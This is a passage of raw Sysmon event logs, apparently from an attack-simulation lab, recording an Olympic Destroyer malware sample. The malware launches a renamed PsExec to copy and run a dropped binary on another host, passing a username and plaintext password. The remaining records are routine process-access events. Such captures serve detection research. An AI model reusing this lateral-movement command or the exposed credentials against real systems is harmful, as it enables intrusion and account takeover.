processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-15.eu-central-1.compute.internal -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000295461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.035{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1546-6216-C306-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:47.616{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91B9DEBBBDDB99EE15A82BFB4A4C362E,SHA256=10F7095A77D473809489361719FD40A3CB08D1F5CC8BFE51B38B12FE12B8D935,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1547-6216-CC04-000000003902}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1547-6216-CC04-000000003902}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.756{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1547-6216-CC04-000000003902}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.757{4F8D34B0-1547-6216-CC04-000000003902}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.709{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFA06F212E61A92012E484CAEA704D15,SHA256=8A679C677220A8D9A092D44640AE4DAA803EC62BB60C287C2B3B1B029A29ECED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.397{4F8D34B0-1547-6216-CB04-000000003902}33923924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000219593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:44.661{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx61110-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000219592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1547-6216-CB04-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219588Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219587Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219586Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219585Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219584Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:47.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219583Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 